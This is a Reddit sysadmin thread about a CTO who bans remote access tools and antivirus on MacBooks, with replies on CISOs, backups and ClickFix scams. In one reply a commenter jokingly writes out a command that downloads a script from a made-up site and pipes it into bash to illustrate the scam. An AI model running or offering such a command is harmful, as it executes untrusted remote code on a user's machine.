CTO banned the use of remote access tool
Posted by uw4yn3@reddit | sysadmin | View on Reddit | 418 comments
Hi everyone, how’s it going?
I’d love to get your perspective on this situation:
I’m the sole guy responsible for IT operations and infrastructure for my country at the company where I work. The company was recently "sold"/migrated to another group within the same conglomerate. I used to report to a highly structured global IT team (80% cloud, very mature processes), but with this transition, an entirely new leadership team took over. The new CTO recently came here to establish the new headquarters in another city.
We are currently in a transition phase, still using a few things from the old infrastructure (Entra ID, Intune, and... our remote access tool). However, the IT team from the old group won't allow us to add any new machines to this access tool during the migration. To make things more interesting, the CTO’s first big mandate upon arriving here was: replace everyone's laptops.
Realizing that I would completely lose the ability to support these new machines, I asked the CTO which global remote access solution they use so I could migrate the machines, or if we should procure a standalone solution just for my country. His answer: "We don't need any."
I didn't understand and pressed the matter. I explained that we operate on a hybrid model, users are scattered, and now that the new HQ is active, I’m being flooded with support tickets from people in another city with these new laptops, where I have zero visibility. He insisted: "No need. You can just guide the user over a video call. It is a global decision not to use remote access tools."
Since he is the CTO and we speak in English with each other (which is not the native language for either of us) I decided not to keep bumping heads.
But the tickets keep coming. Trying to troubleshoot blindly is an absolute hell. Out of desperation, I did my homework: I gathered a few local quotes from standard market remote access tool vendors and presented the pricing to him, showing how users were reaching out to me and why we needed this. He replied again: "We are not going to use remote access."
I simply gave up. I'm not going to keep bumping heads with the CTO. It’s clearly not a budget issue, it feels more like a rigid and inflexible mindset. He never gave me the real "why" behind this rule. At first, I thought maybe it was some extreme, distorted Zero Trust policy or user data privacy thing. But then, a few days later, I asked this same CTO which corporate antivirus solution we were going to deploy, since we are going to stop using the one from the previous group. His response: "We don't need antivirus because we use MacBooks."
At that point, my friends, I decided to just "let it go" and strictly follow his orders. I brought the issues to the highest technical authority in my sector, and he refused to act. If a key user has to spend 4 hours on a video call with me trying to fix a stupid issue that I could solve in 30 seconds via terminal, so be it.
Has anyone here ever dealt with such an inflexible leadership? I’d love to hear your thoughts on this "behavior", your experiences, and what kind of workarounds you’ve used in similar situations.
Thanks!
DenyCasio@reddit
I physically recoiled at "We don't need antivirus because we use MacBooks."
That CTO is the reason CISO role exists.
Just roll with it and either look or tough it out. Idiots will be idiots.
sabre31@reddit
Except CISO are more dumber than CTO in many cases. You can’t win either way.
5redie8@reddit
Our old CTO fought my colleague when they were asked to reboot their Mac as part of basic troubleshooting because they "know FreeBSD and you don't have to reboot these OSes".
These are the people spearheading AI initiatives worldwide BTW.
deepasleep@reddit
Well the AI is going to be smarter than these people.
Narcotras@reddit
If they even listen to it, sadly
Sapper12D@reddit
They forgot that they were already the stupidest ones on the totem pole,
TaxHazyShade@reddit
... just ... wow. Wow.
elitexero@reddit
Makes sense given that fuckpunching AI into every nook and cranny makes absolutely 0 sense in 99% of cases.
5redie8@reddit
Correct. Penn State also introduced an AI major and attached it to an MBA to give you a further idea of the level of executive masturbation we're at by this point.
This is the wet dream execs have had for years where they have a machine that will prove anyone wrong and let them get rid of all the pesky tech people that make their job harder
brianozm@reddit
We just need our first few major public AI disasters to help get things on a more rational footing.
w1ten1te@reddit
I think we've already had them but these companies aren't owning up to it. Many of the CVE's and outages lately are probably caused by know-nothing "prompt engineers" vibe coding features. There's just no incentive for the tech companies to own up to it.
GoogleDrummer@reddit
Well yeah. People with MBA's made that decision.
Ferretau@reddit
That explains why they stop working after a few prompts - they go insane. Fits perfectly for the type of people that are excited by this tech as it currently stands.
Ferretau@reddit
Try telling that to M$
sybrwookie@reddit
I have never encountered a CISO who has an ounce of use. Every single one tries to overban things, then gets his legs chopped out after messing up the business, and then has no teeth to enforce anything.
Cheomesh@reddit
Do tell - not dealt with any directly for actual security stuff, and . angling my career in that direction so I'm all ears on how NOT to be that kind of CISO.
Just_Information334@reddit
A new classic: https://crankysec.com/blog/shite/
Leather-Arachnid-417@reddit
I lived the life of the person that wrote this and I'll never do ot again. People dont want the direct truth. They want robots that do exactly what they say without question and someone to blame when they fuck it up.
Cheomesh@reddit
Hah love it; thankfully mine have never been remotely like that!
Though, it does make it sound like I should have pushed harder to work for Deloitte, hah.
lurking_bishop@reddit
In my life experience, a CISO understands their job description as "lock down everything, don't provide alternatives and disregard power users in particular"
It's especially helpful if the CISO doesn't come from a coding background and hasn't followed the tech / open source scene in decades, because then he'll staunchly defend his restrictions as reasonable, after all he can do his work no problem
bobsbitchtitz@reddit
Its CYA for CISO to say disregard end users. As long as there is a user you'll have an attack vector. I've only been at one company that had super tight restrictions but found a way for eng to still get their job done.
aitorbk@reddit
We can still do our jobs. But a 3 hour task can take two weeks. And be frustrating.
Can we do the job? Yes. Is the client happy if time constrained? No.
So while we can do the job, the restrictions make it not fit for purpose.
Justin_Passing_7465@reddit
Are the policies "maximizing shareholder value"?
Ferretau@reddit
The cost is not longer visible to them - so there's probably execs that are going to get a fat bonus over it.
aitorbk@reddit
Correct. The solution is to minimise risk and costs.
Risk with these Draconian measures, and cost.. well other people and by changing cost centers.
Cheomesh@reddit
Seems like a crappy way to CYA. My background thus far would suggest that I should document a lot of stuff, and if there's of some type we can't close, figure out how we're mitigating potential vulnerabilities, describing them as false or misleading findings, and perhaps if it is a real issue that we can't readily mitigate open a dialogue on how to migrate away from .
Is that the more proper route?
bobsbitchtitz@reddit
Depends on how your leadership handles sec incidents. If c suite is mostly non technical they’ll just say wtf do we have you for if they’re smart they’ll help you balance productivity vs security.
lurking_bishop@reddit
I like to compare company infosec with an immune system.
No immune system -> organism quickly dies
Too aggressive immune system -> organism eats itself and/or loses fitness due to inordinate energy expenditure/exhaustion
A good immune system lies dormant and monitors ingress points until it's alerted. It doesn't prevent the organism from eating shit, but it will quickly spring into action to control the damage.
Centimane@reddit
Completely disagree.
CISO understand their job description as "forward some out-of-context snippets of the report a tool spat out". Hell, I wouldn't be surprised if a CISO sent me a critical security finding for:
anxiousinfotech@reddit
Thankfully ours doesn't do that, but I hear from colleagues regularly about things like 'critical Windows service vulnerability detected on'. Some scanning utility spits it out and no one on the security team has the brains to know that the finding is actually impossible.
Speeddymon@reddit
WSL?
anxiousinfotech@reddit
Not situations where that's in use, nor VMs, or container services. Full fat Linux VM with screaming about a Windows-only service that simply does not exist.
I believe they all use Rapid7 for their vulnerability scanning. I remember piloting it once years ago and the false positives were insane. I mean, it found everything but just like AI it made up a bunch more while it was at it...
Speeddymon@reddit
That reminds me of a false positive from them that I dealt with 9 years ago. The org I was working for at the time was doing vulnerability scanning against their iDRAC Web interfaces and one single device kept getting intermittently flagged for something it couldn't even do. Never did figure out how to get it to stop being flagged until the device was decommissioned.
agent-squirrel@reddit
Nexpose? We have that issue too.
agent-squirrel@reddit
Not even, we had a report from our c-sec team: "Vulnerable NFS server version please patch". The CVE was for Windows NFS server and this was a Linux machine...
Cheomesh@reddit
Mmm, been a minute since I've looked at Linux. That finding, which I already understand to be a non-issue, is just that the tool was looking for shell script called scanning-tool, failed to find it, and gave you a heads up.
Critical's definitely out of the question, but were I dropped into that position tomorrow morning and found that I would probably forward it to you with the question "Should there be scanning-tool.sh, and if so, any idea why it might have gone missing?"
Would that be the correct way to handle it?
agent-squirrel@reddit
I think they were riffing on the fact that the CISO wouldn't actually know what that error meant and saw it as a vulnerability.
Cheomesh@reddit
Yeah, I was trying to make sure I was following (I wasn't)
Centimane@reddit
The joke is: I wouldn't be surprised if the CISO couldn't find the scanning tool on their own machine, and blindly forward the error as a vulnerability.
Cheomesh@reddit
Oh, I didn't pick up on it being their own machine, lol
agent-squirrel@reddit
"Nexpose said..."
"Openvas said..."
Fuck off.
spacelama@reddit
Heh. My old company was in a (constant) state of reorganisation^Wreimagination and I was slowly outgoing from the central linux group, but got a request to install some dodgy security scanner with a slick marketing page and no technical details onto all of our DMZ machines including the 16 webservers. I pushed back, and asked for things such as "how much spool space expected, what egress does it need to get the results sent back to whatever its sending to? You know it installs its own kernel modules right - what's the process during patching? Is there a compatibility matrix? What's the support procedure? What even is the timeline of this urgent request - why have I been requested to push directly to prod DMZ and some of our most sensitive machines first, without being allowed to test on dev machines beforehand?" etc. Of course, I got no answers. So a few weeks later, still getting system alerts but no further involvement in that group, and I notice 1 by 1 over the course of about half an hour, the 16 webservers falling over with full /var because duh, no one had put a firewall request in. They got some other lacky who they knew wouldn't question anything to install it on everything all at once, tainted kernel and all. But of course no one questioned why a bunch of webservers that had a baseline load of 5000reqs/sec had not sent one single byte of information back to the security monitoring system.
Gadgetman_1@reddit
I have a couple of very old tickets hanging in the system, where someone has requested setting up a box to control something and talk to a server on the internet. They're hanging because I still haven't gotten any info on firewall settings, or whether or not any computers on our 'office lan' needs to be able to speak to those boxes also.
I don't care if it's a Solar Panel controller, alarm system or a freakin 'smart vending machine'. No documentation means the guys in network ops can't do their job. and MY job is to make certain Networks get ALL the info they need to do their job.
UntrustedProcess@reddit
It's the office of "No!"
anomalous_cowherd@reddit
"If the CISO is doing their job, you can't do yours."
Any easing up on that is forced on them by requiring the business to function well enough. It's up to others at the same or higher level to make that happen, with advice from people below them on the impact of the actual issues.
spacelama@reddit
All sysadmins, software engineers and cloud folk just operate in Excel and One Drive, don't they? Just sharepoint all the things!
Electrical-Staff0305@reddit
As someone in the embedded/OT cybersecurity world, that is a nightmare scenario to deal with.
And yet, I can see it happening.
Cheomesh@reddit
Oh, yeah, I'm already not like that - thankfully.
Usually if something talks about lock down, I'll look at immediate impacts to the team and if it does cause something, try and figure out if a mitigation, work around, or alternative is viable before actually putting on the clamps.
Occasionally, though, clamps need done.
Competitive_Smoke948@reddit
have some sysadmin experience. there are several CISO types:
1 - ex sysadmins who trust the SMe & are there to work together & compromise where needed 2- non technical CISOs with excellent governance experience who work with the SME & come to compromise
3- the ex techie/knows enough to be dangerous and who wants to look clever - fucking nightmare
4 - the non technical ciso who thinks they know everything to look clever & are a pain
ninjatoothpick@reddit
There's also the CISO that used to work in an admin role and knows how to hire the right people to do the right job without conflict. They're also an overall SME in their own right.
It's great to work with one of these, there's mutual trust and they're available to contribute their experience to the conversation.
Competitive_Smoke948@reddit
i agree, but the CISO should ideally not be touching anything, it's s senior position not a "hands on manager" or shouldn't be. I'm doing architecture stuff & the lengths i have to go to sometimes to stop people giving me the keys to the kingdom....
Cheomesh@reddit
Understood hah
AdmRL_@reddit
It's not about the intelligence of the person in the role, it's about KPI's and stuff. Obviously your mileage will vary from company to company as some companies have dog shit performance systems and pander to execs regardless but assuming you don't have a wider problem in the business then CISO is 1000x better a reporting line for IT & Ops than a CTO.
CTO's by and large are going to be measured on products, on dev work and deliverables. Unless the company has recognised the oddity that is IT reporting to a CTO and specifically catered the CTO role to it then their objectives will have absolutely nothing to do with what IT does. The biggest problem is a CTO reporting line typically comes from ignorance at board level, IT has no representation so they decide to give them it, they have a CEO, CFO, COO & a CTO - they see "Information & Technology" and just assume CTO is best fit.
CISO has it's own problems in terms of conflict of interest between Ops and security,and funnily enough the Remote Access conflict can still occur as CISO's sometimes hate it on security grounds, but at the very least their own KPI's and objectives are going to broadly fit with IT as a function and you won't hit these sit com level stupid decisions like OP has described. Inversely as well if you have a CTO & CISO and IT end up under CISO, it at least signals the business understands IT and Dev should not cross polinate at that level.
I went through similar to OP with a CTO reporting line and after that I'm pretty much set on my order of preference being:
CIO > COO > CFO > CEO > CISO > CRO > CMO > The cafeteria manager > no management line at all >>> CTO
teh_chaosjester@reddit
I had to argue with my CISO that while annoying, tapes are part of a robust and valid backup and DR plan. He just said "go cloud"... So ya, CISO not always an essential position...
FuckinHighGuy@reddit
Tape backups need to die a horrible fiery death.
Loud-Diamond-540@reddit
Tape back ups are fine, unless you need to restore them
agent-squirrel@reddit
I'm genuinely curious why?
We are a research institution that has to store research data in the petabytes for long long periods of time and so far it seems the only thing that makes viable sense is tape. Is there another option bar spending squillions we don't have on cloud storage?
iheartrms@reddit
I miss tape. I never had greater confidence in being able to restore than when we had tape and rotated a backup off site. It made the 3-2-1 rule easier to implement.
Lachiexyz@reddit
That's not at all true. Tapes are still cheap per TB to store large volumes of archive data for long periods of time. Recovery speed and cost is also far lower than pulling from glacier.
Tape technology is also still evolving. LTO-10 came out last year, and there's already plans for the next few iterations.
Tape is going nowhere.
FuckinHighGuy@reddit
Did I say it was going nowhere! No. It just needs to die.
Lachiexyz@reddit
It doesn't though. It's a perfectly adequate archival media. It's also secure. It's airgapped as soon as it's ejected from the drive, and if you use WORM media, you also have immutability out of the box as well.
I'm failing to see the downside?
FuckinHighGuy@reddit
You have your opinions, I have mine.
Have a great evening.
JLee50@reddit
What do you think Glacier Deep Archive is?
FuckinHighGuy@reddit
Backup solution for poor companies.
JLee50@reddit
Or media heavy companies. Tape is still king for petabyte scale video archive.
altodor@reddit
Backup solution for companies that want cheap storage and then pray they don't need to mortgage the company to download them.
FuckinHighGuy@reddit
This!
teh_chaosjester@reddit
I don't disagree, but as part of a good 3-2-1 plan, unfortunately they still have their place :(
Designer_Solid4271@reddit
CISOs aren’t happy until no one has access to anything. Because by the very nature of having access the system is unsecured in their books.
creenis_blinkum@reddit
>more dumber
great going chap
BananaSacks@reddit
You do realize that not everyone here is 'Murrican, right?
nlfn@reddit
The beautiful thing about language is that sometimes breaking the rules can really emphasize your point. Only the most smartest people get it though.
Sanchez_87_@reddit
What you've just said is one of the most insanely idiotic things I have ever heard. At no point in your rambling, incoherent response were you even close to anything that could be considered a rational thought. Everyone in this room is now dumber for having listened to it. I award you no points, and may God have mercy on your soul.
FuckinHighGuy@reddit
100% agreed.
vivnsam@reddit
That's all you need to hear to know the CTO is in over his head.
Pussy_handz@reddit
Ive never heard of a major corporation standardizing MacBooks, thats lunacy.
Horsemeatburger@reddit
Well, there's that a small outfit named IBM which 10 years ago introduced their Mac@IBM program where employees could chose which platform they wanted, and apparently over 73% went to Macs.
OK, maybe it's not such a small outfit, they quickly amassed a fleet of well over 200,000 Apple devices after introducing the program.
Last I heard, the percentage of users ever calling their IT helpdesk was 5% for Mac users vs 40% for Windows users. Apparently they saved between $270 to $543 per user over a 4-year period compared to Windows PCs, despite the higher upfront hardware cost of a Mac, which was the case when they were still intel based (nowadays Mac laptops cost around the same as a same class Windows business laptop).
Standardizing on MacBooks isn't lunacy.
What's lunacy is sticking with Windows and the rest of the Microsoft ecosystem, the platform which has the by far highest TCO, coming from a vendor who doesn't really do quality control or security.
MyWifesBoyfriend_@reddit
Big tech and all of the bay area/silicon valley uses MacBooks
AlexisFR@reddit
Who do they think they are? Marketing Artists?
zbignew@reddit
Software developers?
le_fuzz@reddit
There’s a small hardware company in Cupertino California called “Apple Inc” that standardized on MacBooks. No antivirus installed and users have full admin.
wild-whorses@reddit
Think of all the money they save not having to buy AV/EDR licenses.
_Gobulcoque@reddit
Either this guy is the turd in the pool, or I've had a string of intelligent CTOs over the decades.
It has to be the former, surely?
ISkyWarrior@reddit
Well, just like defender is built-in on windows, XProtect is built-in on MacOS. So that could be the logic the CTO is going with. Not sure if the Apple Business Manager allows the same kind of management as the M365 portals though for management of it (Not sure if it can even be managed at all).
GistfulThinking@reddit
I audited 600 macs and 600 windows PCs back in 2012
The windows units all had 2 to 5 viruses or flagged items each.
By comparison, maybe 30% of the Mac fleet had been flagged, but for those 30% the rate was 60+ flags each.
Wide vs Deep is often not considered..
That said, 99% of all had been automatically cleaned up.
AV stayed, performance be damned.
nokstar@reddit
EACH?
Sounds to me like someone got infected and no ZT protocols in place (if any AV was actually utilized) just spread like wildfire.
Or you’re full of it.
1esproc@reddit
Press X for Doubt
Leather_Secretary_13@reddit
it's possible hes just not telling OP about it.
Careless-Age-4290@reddit
I've seen so many idiots move through those type positions while seemingly hiding the they're an idiot to everyone but the people under them. They always proclaim some emergency trying to unite everyone under them, offer these insane takes as if they were a thought leader trying to say bold things on LinkedIn, and they always get super angry when anyone pushes back. People make it work in spite of them, and then eventually something happens and they just disappear and you find out they colossally fucked up something while making a ton of enemies.
I'd be at a loss except they seem to come with large organizational changes that I always wonder if they're being played as the stooge themselves who are used to force a change, blame them, fire them, keep the change.
doktormane@reddit
Are you using E5 licenses? Microsoft will be including the Intune Suite in that, which comes with RemoteHelp.
bdam55@reddit
Remote Help will end up in E3.
gwildor@reddit
quick assist is included free with windows 11.
apple offers a similar solution, also included.
BrentNewland@reddit
Quick Assist doesn't allow admin escalation. Besides, original post says they're switching to Macbooks.
TYGRDez@reddit
Does QA still black out the screen when UAC prompts come up?
I found it pretty much unusable because of that.
gwildor@reddit
i believe it does - but op said he can fix it in 4 hours via a video call, so that implied to me he can fix it with user credentials, and the user he is on the phone with can click allow for him.
RBeck@reddit
And it's surprisingly good.
JonnyLay@reddit
I just learned windows+ctrl+q today.
Windows doing something good...
Shazam1269@reddit
Can you pass admin credentials over QA? Been a while since I've used it.
Thrizzlepizzle123123@reddit
Well, damn. That might be one of the more valuable things I've learned on reddit.
KimJongUnceUnce@reddit
Remote help is pretty garbage too. It's barely any more capable than a screen share over teams.
No_Appearance2090@reddit
Remote Help at least lets you do some basic elevate privileges and type in admin passwords. Quick Assist doesn't.
SDS_PAGE@reddit
We don’t need Microsoft as we have MacBooks!!
Substantial-Fruit447@reddit
Yeah, but not until July 1st at the earliest, and there's nothing that will say it will be globally available (unless I missed it)
RevengyAH@reddit
The CTO is either an idiot, or… he’s been told to cut costs severely.
Neither bodes well for your employment… recommend jumping ship :)
gwildor@reddit
don't blame them. if the user is Infront of the PC they need help with - then you don't need a paid-for unattended access tool.
quick assist on windows. remote access on apple. a screenshare with remote control on teams or google meet.
I could be remoted into your PC in less time than it took to write this post, for free. without violating any of the constraints laid out by the CTO in the post.
RevengyAH@reddit
Are you the CTO lmfao?!
Shall you tell us why we shouldn’t blame them for the no EDR/XDR?
gwildor@reddit
nah, thats dumb...but: i either use this one legacy tool, or no tool at all, is a terrible mindeset.
an extremist being upset at an extremeist is silly.
NotAnOwl_@reddit
"don't blame them. if the user is Infront of the PC they need help with - then you don't need a paid-for unattended access tool."
One of the most frustrating things I still have to explain is how to use the reset emergency pin, and I swear some users are freaking blind; half the time they don't even know the terminology used to navigate (tabs, context menu, etc etc) . Some descriptions I have on the daily "the thing next to the other thing that does that stuff".
You have one valid point... paying a premium only for unattended is a luxury; I could get behind that. However, I feel the CTO is against ALL remote access, and I sincerely think he would not accept a free tool, and I would be worried about not following a policy for my personal morality.
I would consider myself being so stupid working harder for less result; this isn't the way.
gwildor@reddit
The only constraint OP informed us of is 'no new deployments on the existing tool'.
Im also 98.6% sure that "video call" actually means "screen share via teams" ( or similar) where you can request remote control from a screen share versus the 'video call on my cell phone' that OP assumed.
NotAnOwl_@reddit
Video call to me meant "FaceTime". If via Teams, more performant tools are available, but yeah, I could live with it.
But "backstage" access was new to me 5-6 years ago, and I wouldn't want to go back to before that.
gwildor@reddit
OP spent time explaining to us the language barrier. I inferred and applied my experience with similar communication disconnect events.
inferring a bit more - good chance they are either a 365 or a gsuite shop, regularly using the chat features.. call = teams call. video = screen share.
in other words - to the CTO, an obvious solution that they already have.
forlornhope22@reddit
oh yeah. Definitely teach users to enable remote desktop sharing. there's no security issue there.
gwildor@reddit
i see you are unfamiliar with the solutions.
warpedgeoid@reddit
I mean, almost all endpoint security products are scams, so I understand that part.
Substantial-Fruit447@reddit
Get it in writing that he either:
1) does not want to use the existing remote access tool
2) does not want to use ANY remote access tool, even a new one
Or both.
Then, when people start complaining to the CEO you can said "Well, the CTO said no remote access, so we can't help anyone."
DizzyAmphibian309@reddit
Lol I'm not sure why you think that OP, a lowly sysadmin, is ever going to be sitting in front of a CEO, pulling up his emails to pin the blame for a bad helpdesk experience on the CTO. Like what kind of fantasy is this? Do you live in Middle Earth with the Hobbits?
If people start complaining, it's going to be to the CTO, not the CEO, and that's where the escalations will stop. The CTO will refuse to admit it's a remote access problem and will just fire OP for providing bad service. That's the reality of the situation.
OP, I suggest you touch up your resume and start applying for new jobs. Your drop in performance is not going to be blamed on the CTO. It doesn't matter what your emails say, it's going to be blamed on you. Credit rolls uphill, shit rolls downhill. You're downhill.
Xattle@reddit
Depending on what position OP has and what data they deal with, there might be personal liability for negligence. Might not save the job but might help in a court if it comes to it.
r3rg54@reddit
When has this ever happened?
Substantial-Fruit447@reddit
Lmfao.
My last CTO got axed because they were insufferable.
Some of us in IT got thrown under the bus and ended up having to sit in front of HR and defend ourselves because of stupid policies or decisions that our CTO had made.
I don't know how large of an org you've worked with or currently work for, but in my case we are multinational manufacturing company. People will complain to their direct supervisor, who takes it to their manager, who takes it to the Director of Manufacturing, so then takes it to the VP of Production, who then complains to the COO that the IT department are creating barriers to producing money.
The COO the goes to the CEO and says "You need to talk to the CTO and straighten this out."
The CTO will either 1) do nothing 2) find scapegoats and try to make excuses, or 3) rarely, admit their mistakes and correct it.
All we had to do was put all of their Departmental Emails out in front of HR and the CEO to say "We tried to advocate against these decisions because we knew it affect our frontline operations and our customer experience."
CTO was gone the next day.
DizzyAmphibian309@reddit
That's pretty rare in my experience. The COO skipping the part where he talks to the CTO before escalating to the CEO is very weird. I'd wager the COO talked to the CTO, found him to be unresponsive, and was forced to escalate. I just can't fathom a situation where escalation would go all the way up to the CEO before anyone attempted mediation laterally.
In my organization, which has tens of thousands of Corp employees, no disputes ever escalate past the VP level, which is usually about 3 levels below the CEO. Two VPs going to their SVP saying they can't come to an agreement doesn't reflect well on them. And I'm not talking some remote access tool, I'm talking "which of us gets to own this project that is expected to bring in $5B in revenue within the next 10 years" arguments.
HenrikWL@reddit
So, your organization is basically bisected, with the C-level managing some imagined organization while the actual operations are entirely handled by the VP level? Thats … certainly a strategy.
Substantial-Fruit447@reddit
CYA, always.
Cover. Your. Ass.
The company is coming to save you, they won't. You need to do it yourself.
r3rg54@reddit
Why would you ever need that in writing?
Substantial-Fruit447@reddit
For when user/customer support falls apart and they come looking for someone to fire?
Is it really that hard to fathom?
r3rg54@reddit
Yes. OP almost invariably still gets fired in this situation, and might be fired when asking for it in writing. Why OP is even talking directly to the CTO is kind of amazing in itself unless this is a really small company with inflated titles.
Shazam1269@reddit
Right? If it's not documented, it didn't happen. Your word against a C suite? Yeah, you're going to have a bad time.
r3rg54@reddit
Yes. OP almost invariably still gets fired in this situation, and might be fired when asking for it in writing. Why OP is even talking directly to the CTO is kind of amazing in itself unless this is a really small company with inflated titles.
ElectroSpore@reddit
Who needs exploits when you can trick windows, mac or linux users into copying shell commands into the console.
https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/
mysticalfruit@reddit
PPP: People, Policies, Procedures.
You can have the best security in the world, but if your users are willing to curl a random website into a sudo command, you're fucked.
boli99@reddit
there are too many new packages resorting to 'curl pipe bash' as an accepted install method these days.
cas13f@reddit
Linux evangelists making fun of windows clickfix victims in the consumer subs get REALLY upset when you point that out.
Just_Information334@reddit
The security first language, Rust: https://rust-lang.org/tools/install/
Windows Subsystem for Linux
If you’re a Windows Subsystem for Linux user run the following in your terminal, then follow the on-screen instructions to install Rust.
Privacy_is_forbidden@reddit
crowdstrike has blocked this for us when a user did it.
He mentioned nothing. We saw the detections after he tried running the commands. We network isolated, then took his laptop and he couldn't imagine what he did that might have warranted the response, it was unbelievable. Only after I found the details of what happened and I spelled out the scenario step by step did he suddenly remember "oh yeah, I copied and pasted this random command a website told me to run about a dozen times"
ASentientRailgun@reddit
We've had a user try this. It was flagged and stopped, but Jesus.
People won't read an error message to tell me what it said, but they'll open a terminal window for some random website popup? I'll never understand people.
NEU_Throwaway1@reddit
Right? If I'm on a call with a user and the meeting is for "Install Google Chrome", they will stop and ask me on every dialogue box "It's asking me to press yes if I want to install Google Chrome."
Meanwhile if they get a pop up that says to call a random 1800 number or execute a script, suddenly they're experts in reading comprehension.
boli99@reddit
its because they arent thinking how to answer the question
they are thinking 'how can i interpret this question in order to get a break from work'
Visitor_X@reddit
I was once helping someone to connect to the (then new) corporate SSL-VPN. They had received instructions via email and claimed over the phone to be following them but still no luck. I couldn't see connection attempts so I asked them to follow the procedure once again and listened what they were doing. So... when the installer pop-up came asking if you want to install, he rapidly clickedNO and explained it to me that there is a standing order not to click "OK", "Allow" etc. to any random pop-ups that come up from web pages...
I think my forehead is still a bit caved in from the facepalm I did and it's been over 15 years already.
wanderinggoat@reddit
what is it with error messages that people refuse to read it or start saying blah blah when it comes to the critical part ? I always wonder if they are trying to avoid getting the problem fixed.
Background_Lemon_981@reddit
Which is why you need to restrict ordinary users from using the console. Who doesn’t do this?
agent-squirrel@reddit
curl -s https://gingerrights.com/wicked_script_make_computer_fast.sh | bash196430754829@reddit
You wanna hear the wildest social engineer I encountered in the wild?
Customer placed a ticket “got a virus”. Cool - standard stuff. Well..she was trying to get to linked in. Googled it and clicked the first thing she saw - SOMEHOW, they convinced her the way to get into LinkedIn was to run a bash command which then downloaded a macro…..
like how many times in your life have you ever opened a terminal to get into a web page…
perkia@reddit
I'm running QubesOS, this is clearly a trick question. Right?
CarnageAsada-@reddit
People are complete idiots if they fall for this 😂
ElectroSpore@reddit
In every company there are a bunch of them.
ratmouthlives@reddit
This is precisely why I follow this sub. For people like you to come with the links so I can then in turn try to scare straight my higher ups into letting me implement property security standards.
andrewsmd87@reddit
I have all of the c suite sufficiently scared of iso and cyber insurance. It's a god send when I just need something approved
Mrhiddenlotus@reddit
It's crazy the things execs will do when you say the words "compliance" and "cyber insurance".
Hapless_Wizard@reddit
Best conversation I ever had with an SMB money guy was after him denying the purchase of a firewall.
I just printed out a stack of multimillion dollar lawsuits against companies failing to properly secure client data, dropped it on his desk, and went to lunch. He approved everything I had asked for by the end of the day.
twitchd8@reddit
You're lucky. Your superior actually read the information you took the time and initiative to print.
andrewsmd87@reddit
I don't mean this to be gender specific for you but it fits as a response regardless :)
https://c.tenor.com/6FwBg2HbmKgAAAAC/tenor.gif
ishboo3002@reddit
I've had three malware incidents in the last month all of them engineers on Macs, luckily our EDR caught them all.
Brilliant-Advisor958@reddit
One if my users fell for one if these but via fake captcha on a trusted vendors site.
The vendor was compromised and their site was pushing this.
Thankfully our EDR caught it and locked out the pc.
andrewsmd87@reddit
We are a full Windows shop. I'm not a Mac hater or Ms fan boy we just want to support one thing and for business related stuff, it just makes sense.
New CEO override all of our policies and we had to update our ISP to add an exception for him to have a Mac without any of our av stuff because it didn't need it.
Took 4 months for it to get malware
w1ten1te@reddit
What does ISP mean in this context? It's clearly not Internet Service Provider.
andrewsmd87@reddit
Information security policy. The thing we make people agree to when they start and then every year to stay iso compliant. Didn't even dawn on me that acronym would be confusing because I'm in info sec most of the time, sorry!
fencepost_ajm@reddit
Let insurance be the bad guy. "Sir, we can do that for you but the way our policies are written we'll be paying about $XXk more per month."
harubax@reddit
Exactly!
andrewsmd87@reddit
I did. His solution was the exception in our ISP. It was basically saying I'll tank the company if I get hacked because insurance won't cover this but I want my Mac
whtbrd@reddit
Also get in writing about the anti-virus. Might, maybe, be worth reaching out to someone from the CISO's office or GRC to see if there's a policy he's violating. In any case, get all these decisions he's making in writing. If nothing else, follow ip with an email to him like so: "Just i can reference this later, in our phone call you stated that it's a corporate policy that the service desk should not have any remote access tooling to be able to troubleshoot user issues. That any and all troubleshooting should be done via a phone call and... and i will comply with this moving forward " "...in our phone call you stated that I am not to install any anti-virus software on end user systems when they are Macs, which i will comply with moving forward."
FuckinHighGuy@reddit
Asking the CTO to put his words into writing isn’t going to go well for anyone except the CTO.
Substantial-Fruit447@reddit
You don't have to come right out and say it, but just send an email that makes it sound like you're looking for clarity or something.
And no, it has worked before. My previous CTO was fired for similar decisions that were pants-on-head retarded, and when enough complaints were going to the COO, CFO and to the CEO there was an inquiry.
All we had to produce were the emails from the CTO on those decisions.
r3rg54@reddit
Ok? Writing still doesn’t matter there, the volume of complaints does.
NDaveT@reddit
It matters when the CTO tries to blame OP for not using remote access tools.
Substantial-Fruit447@reddit
No, because it would have been me or someone on my team getting fired if we didn't have any evidence to the contrary of "The IT Department isn't helping anyone."
Or, in my case, "The IT department can't fix our network outages so we're bleeding away millions of dollars in revenue every hour."
The problem wasn't that we couldn't fix them, but that our CTO refused to extend budget to enhance network reliability and redundancy. They had already fired all of my predecessors for "not being agile enough to resolve outages for business operations" when it was actually our architecture, our equipment, and our reliance on single-line ISP feeds that were the issue.
what_dat_ninja@reddit
It was somewhat true at one point, but that was a very long time ago.
bacon59@reddit
30 year old myth due to shitty advertising by mac. They got 80% less viruses because businesses didnt run on mac back in the 90s like that and they had 80% less corporate marketshare
Vectan@reddit
+1 for this and I am a life long Mac user. Still need protection.
signal_lost@reddit
Also, MacBooks not needing Antivirus/EDR is a myth.
Apple doesn't use a 3rd party but that's because they USE XProtect & MRT, and rely heavily on Zero Trust.
Alpha-State_@reddit
S1 is your go to Antivirus for Corporate environment
wrt-wtf-@reddit
This is important. Macs have an inbuilt tool for remote access as does windows. But they aren’t the best option.
Mac is not impervious to malware, hacks, and viruses.
I’d would ensure that the conversations were at a minimum diarised and best in minutes of a meeting shared with all parties involved.
At some stage the business will be compromised. Depending on the business, what it does, and its key customers the board of the business could come under direct scrutiny for its policies. Make sure that you are covered and that your advice/queries are noted and records maintained. CYA - cover your ass.
FauxReal@reddit
Getting the new policy in writing should definitely at least be a company-wide email and an entry in their intranet/help documentation on the subject.
I would not say, "so we can't help." That'll just get OP disciplined because the CTO did not say that. The CTO said to use video calls. Which is trash, but not saying OP can't help.
Emotional_Garage_950@reddit
dude sounds like either an idiot or it actually is definitely budget related.
use Teams screen share if that’s allowed, and provide the LAPS password to the user if elevation is required. Configure LAPS to rotate the password after it gets used
harrywwc@reddit
so much this ⬆️
this needs to be in writing so that when (not "if") the shit hits the fan, OP's arse will be covered.
of course, the blame will still fall on OP because that's what happens. :(
heinternets@reddit
What do you need remote access for? With Intune, Defender, Quick Assist, VPN, not sure why you need any other apps
